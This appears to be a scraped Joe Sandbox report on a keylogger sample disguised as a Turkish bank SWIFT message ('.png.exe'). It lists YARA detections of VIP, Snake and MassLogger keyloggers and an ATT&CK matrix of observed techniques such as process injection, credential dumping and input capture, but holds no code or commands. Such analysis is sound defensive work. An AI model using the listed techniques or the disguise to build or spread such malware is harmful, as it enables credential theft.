Source: Yara match	File source: 0000000A.00000002.2970078800.00000000049D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1730790993.0000000000599000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2953656770.0000000002100000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2962477768.0000000003421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2965310039.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2969184624.0000000004A10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2964658526.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Native_New-Nova.exe PID: 7380, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Native_snake01.exe PID: 7396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Native_New-Nova.exe PID: 7800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Native_snake01.exe PID: 7820, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 10.2.Native_snake01.exe.49d0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.2221216.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.4930f20.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.3.Native_snake01.exe.680768.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.4a10000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.4a10000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.49c0f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.2221216.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.49d0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.49c0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.49c0f20.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.4930000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.4930f20.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.22202f6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.49c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.2141216.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.21402f6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.4930000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.2141216.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.21402f6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.22202f6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.3.Native_snake01.exe.680768.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2954940699.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2969063278.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.1776206771.0000000000680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2969436130.0000000004930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2956341043.000000000255B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1732371805.0000000000768000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2970078800.00000000049D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2953656770.0000000002100000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2969184624.0000000004A10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2957921883.000000000271C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Native_snake01.exe PID: 7396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Native_snake01.exe PID: 7820, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	111 Native API	1 Scheduled Task/Job	112 Process Injection	11 Deobfuscate/Decode Files or Information	11 Input Capture	1 File and Directory Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 Command and Scripting Interpreter	Logon Script (Windows)	1 Scheduled Task/Job	14 Obfuscated Files or Information	Security Account Manager	24 System Information Discovery	SMB/Windows Admin Shares	1 Screen Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	Login Hook	Login Hook	22 Software Packing	NTDS	141 Security Software Discovery	Distributed Component Object Model	1 Email Collection	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	11 Input Capture	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	3 Process Discovery	VNC	1 Clipboard Data	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	112 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Ziraat_Bankasi_Swift_Messaji.png.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: MassLogger

Threatname: Snake Keylogger

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Ziraat_Bankasi_Swift_Messaji.png.exe